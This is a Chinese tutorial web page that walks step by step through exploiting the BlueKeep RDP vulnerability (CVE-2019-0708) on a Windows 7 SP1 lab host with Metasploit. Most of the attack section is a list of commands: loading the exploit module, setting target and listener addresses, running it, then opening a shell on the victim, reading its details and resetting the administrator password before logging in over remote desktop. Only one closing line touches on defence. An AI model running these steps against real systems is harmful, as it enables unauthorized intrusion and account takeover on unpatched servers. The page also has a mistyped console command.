网站首页 > 技术教程 正文
一、背景介绍
Windows 系列服务器于 2019 年 5 月 15 号,被爆出高危漏洞,该服务器漏洞利用方式是通过远程桌面端口3389进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的永恒之蓝病毒差不多。2019年9月7日晚上凌晨 1 点左右,metaspolit 官方更新了漏洞利用程序。CVE-2019-0708 漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过 rdp 协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用,会导致服务器被黑客入侵、感染病毒,像WannaCry永恒之蓝一样大规模的感染。该漏洞影响范围较广,Windows7 SP1、windows2003、windows2008和08 R2、windows xp 系统都会遭到攻击。那么如何利用该漏洞拿下目标主机呢,接下来让我们一起学习!
二、资源装备
1.安装好 Kali Linux 的虚拟机一台
2.Win7 SP1受害者主机一个;
3.整装待发的小白一个。
三、渗透实战
3.1 打开Metasploit渗透框架,如下如所示。
命令:msfconsole
3.2 检索有关远程桌面的已知漏洞,如下图所示。
命令:search 0708
3.3 使用检索到的关于远程桌面的漏洞利用模块,如下图所示。
命令:use
exploit/windows/rdp/cve_2019_0708_bluekeep_rce
3.4 查看攻击目标需要设置的参数,如下图所示。
命令:show targets
3.5 设置相关攻击参数,如下图所示。
命令:set rhosts 192.168.0.106
set lhost 192.168.0.102
set target 4
3.6 执行漏洞攻击模块,如下图所示。
命令:run
3.7 利用建立起来的会话查看受害者主机系统的相关信息,如下图所示。
命令:sysinfo
3.8 利用建立起来的会话查看受害者主机系统的相关信息,如下图所示。
命令:ipconfig
3.9 查看会话命令帮助信息,如下图所示。
命令:?
3.10 进入受害者主机cmd界面并解决乱码问题,如下图所示。
命令:shell
chnp 65001
3.11 利用“whoami”命令查看相关信息,如下图所示。
命令;whoami
3.12 利用cmd命令在受害者主机创建一个新用户,如下图所示。
命令:net user administrator 123456
3.13 利用图形化远程桌面登录工具登录受害者主机,如下图所示。
3.14 成功利用图形化远程登录工具拿下目标主机,如下图所示。
3.15 远程桌面漏洞防护措施,如下图所示(关闭远程桌面登录服务、开启防火墙、安装第三方电脑管家等等)。
猜你喜欢
- 2025-05-26 Citrix 桌面云XenDesktop7.18部署(八)win10虚拟机模板安装
- 2025-05-26 咋办?新电脑不支持win7系统,不喜欢win10,一个软件轻松搞定
- 2025-05-26 300系列主板上Win7?没想的那么复杂
- 2025-05-26 从零开始的软路由之爱快虚拟机安装windows
- 2025-05-26 华硕ZenFone 2移植了Win7系统?虚拟机?
- 2025-05-26 折腾:Win7换上Win10登录界面!
- 2025-05-26 VMware10 版虚拟机安装win7系统
- 2025-05-26 Boot Camp 停用Win7
- 2025-05-26 没事折腾着玩:超级简单的windows系统运行甜糖星愿教程
- 2025-05-26 如何在VMware中新建虚拟机安装Windows ghost系统?
你 发表评论:
欢迎- 07-17iOS14画中画,这些视频应用已经支持了
- 07-17一款认为比较好用的极简播放器(最精简的播放器)
- 07-17Carplay最好用的音乐播放app是哪个?
- 07-17QQ影音新版发布 Gif截图提供大小选择
- 07-17腾讯 QQ HD 从苹果 App Store 下架
- 07-17字节跳动内测首款音乐App汽水音乐
- 07-17抖音APP最新内测版:加入听全曲功能 推出极简版音乐播放器
- 07-17最干净影音播放器!QQ影音V3.8发布下载
- 最近发表
- 标签列表
-
- sd分区 (65)
- raid5数据恢复 (81)
- 地址转换 (73)
- 手机存储卡根目录 (55)
- tcp端口 (74)
- project server (59)
- 双击ctrl (55)
- 鼠标 单击变双击 (67)
- debugview (59)
- 字符动画 (65)
- flushdns (57)
- ps复制快捷键 (57)
- 清除系统垃圾代码 (58)
- web服务器的架设 (67)
- 16进制转换 (69)
- xclient (55)
- ps源文件 (67)
- filezilla server (59)
- 句柄无效 (56)
- word页眉页脚设置 (59)
- ansys实例 (56)
- 6 1 3固件 (59)
- sqlserver2000挂起 (59)
- vm虚拟主机 (55)
- config (61)
本文暂时没有评论,来添加一个吧(●'◡'●)